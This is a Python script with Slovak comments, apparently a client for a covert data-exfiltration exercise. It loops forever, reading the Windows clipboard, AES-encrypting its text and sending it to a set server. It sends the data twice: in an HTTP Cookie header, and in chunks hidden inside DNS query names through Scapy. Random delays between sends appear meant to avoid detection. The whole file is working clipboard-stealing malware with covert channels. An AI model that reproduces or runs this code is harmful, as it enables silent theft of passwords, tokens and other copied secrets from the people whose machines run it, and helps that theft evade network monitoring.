import requests
from base64 import b64encode, b64decode
from time import sleep
import win32clipboard

from Crypto.Cipher import AES  # pycryptodome
from Crypto.Util.Padding import pad

from scapy.all import *  # Scapy
from scapy.layers.dns import DNS, DNSQR
from scapy.layers.inet import IP, UDP
from scapy.layers.l2 import Ether

src_mac = get_if_hwaddr(conf.iface)  # MAC adresa klienta
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
src_ip = s.getsockname()[0]  # IP adresa klienta

dst_mac = '4c:d5:77:0d:88:c5'  # MAC adresa servera - je potrebne zmenit !!!
dst_ip = '172.20.10.5'  # IP adresa servera - je potrebne zmenit !!!
http_dst_port = '8888'  # PORT pre HTTP
dns_dst_port = 1111  # PORT pre DNS

key = b'AAAABBBBCCCCDDDD'  # kluce sa musia zhodovat !!!
iv = os.urandom(16)  # klient generuje a zasiela IV na server !!!


# sifrovanie udajov
def encrypt(data):
    cipher = AES.new(key, AES.MODE_CBC, iv)
    padded_data = pad(data, cipher.block_size, style='pkcs7')
    return cipher.encrypt(padded_data)


# pauza nahodny pocet sekund
def wait(t1, t2):
    sleep(random.randint(t1, t2))


# zaslanie udajov prostrednictvom HTTP Cookie
def sendDataThroughHTTP(url, data):
    # https://requests.readthedocs.io/
    # Requests is an elegant and simple HTTP library for Python, built for human beings.
    r = requests.get(url, headers={'Cookie': data})
    print(b64decode(r.content).decode('utf-8').rstrip())


# zaslanie udajov prostrednictvom DNS Query
def sendDataThroughDNS(data):
    global src_mac, dst_mac
    global dst_ip, dns_dst_port

    for i in range(0, len(data), 10):  # rozdelenie udajov na casti
        chunk = data[i:min(i + 10, len(data))]
        print('Odosielam časť údajov: %s' % chunk)

        edata = encrypt(bytes(chunk, 'utf-8'))  # cast udajov sa zasifruje
        # edata = edata + bytes('.google.com', 'utf-8')

        # DNS Question Record (dns.py)
        query = DNSQR(qname=edata)
        # Scapy packet = Ether - l2.py, IP, UDP - inet.py, DNS - dns.py
        pckt = (Ether(src=src_mac, dst=dst_mac) /
                IP(dst=bytes(dst_ip, 'utf-8')) /
                UDP(dport=dns_dst_port) /
                DNS(qd=query))
        # pckt.show()
        # Scapy - Send and receive packets at layer 2 and return only the first answer - sendrecv.py
        r = srp1(pckt, verbose=True)
        print(r)

        wait(3, 10)  # pauza


def main():
    print('IP adresa klienta:', src_ip)

    while True:
        # priebezne nacitanie obsahu Clipboardu (iba text) a odoslanie na server
        win32clipboard.OpenClipboard()
        clipdata = win32clipboard.GetClipboardData(win32clipboard.CF_TEXT)
        win32clipboard.CloseClipboard()

        # zaslanie udajov prostrednictvom HTTP Cookie ---------------------------------------------
        data = ''
        try:
            data = clipdata.decode('utf-8')  # kodovanie UTF-8
        except Exception as e:
            print(e)
            try:
                data = clipdata.decode('latin-1')  # kodovanie Latin-1
            except Exception as e:
                print(e)
                try:
                    data = clipdata.decode('windows-1252')  # kodovanie Windows-1252 (SVK diakritika)
                except Exception as e:
                    print(e)

        # format zasielanych udajov = src_ip|xxx|data
        ddata = bytes(src_ip + '|xxx|' + data, 'utf-8')  # konverzia string na bytes
        print('IV')
        print(iv)
        print('bytes DATA')
        print(ddata)
        edata = iv + encrypt(ddata)  # udaje sa zasifruju a doplnia za IV
        print('IV + encrypted DATA')
        print(edata)
        edata = b64encode(edata)  # b64 kodovanie IV a zasifrovanych udajov
        print('b64encoded IV + encrypted DATA')
        print(edata)
        try:
            sendDataThroughHTTP('http://' + dst_ip + ':' + http_dst_port, edata)
        except Exception as e:
            print(e)

        wait(3, 10)  # pauza

        # zaslanie udajov prostrednictvom DNS Query -----------------------------------------------
        sendDataThroughDNS(data)  # udaje su odoslane po castiach
        sendDataThroughDNS('|xxx|')  # vsetky casti boli odoslane


if __name__ == '__main__':
    main()
